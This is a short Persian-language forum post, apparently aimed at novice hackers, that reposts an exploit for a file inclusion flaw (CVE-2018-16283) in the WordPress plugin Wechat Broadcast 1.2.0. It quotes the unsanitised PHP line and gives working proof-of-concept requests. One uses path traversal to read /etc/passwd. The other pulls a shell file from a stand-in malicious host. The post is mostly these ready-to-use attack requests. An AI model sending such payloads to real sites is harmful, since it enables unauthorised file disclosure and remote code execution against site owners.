SpareNet Servers Advertising & Link Exchange

اطلاعیه

بستن
هیچ اطلاعیه ای هنوز ایجاد نشده است .

WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion

بستن
X
 
  • فیلتر
  • زمان
  • نمایش
پاک کردن همه
نوشته‌های جدید

  • WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion

    کد:
    # Exploit Title: WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion
    # Author: Manuel Garcia Cardenas
    # Date: 2018-09-19
    # Software link: https://es.wordpress.org/plugins/wechat-broadcast/
    # CVE: CVE-2018-16283
    
    # Description
    # This bug was found in the file: /wechat-broadcast/wechat/Image.php
    # echo file_get_contents(isset($_GET["url"]) ? $_GET["url"] : '');
    # The parameter "url" it is not sanitized allowing include local or remote files
    # To exploit the vulnerability only is needed use the version 1.0 of the HTTP protocol
    # to interact with the application.
    
    # PoC
    # The following URL have been confirmed that is vulnerable to local and remote file inclusion.
    
    GET /wordpress/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd
    
    # Remote File Inclusion POC:
    
    GET /wordpress/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=http://malicious.url/shell.txt
    ویدئو آموزشی این آسیب پذیری را نیز مشاهده نمائید .
    -----------------------------SAFE MASTER---------------------------
    تاپیک هکر های تازه وارد
صبر کنید ..
X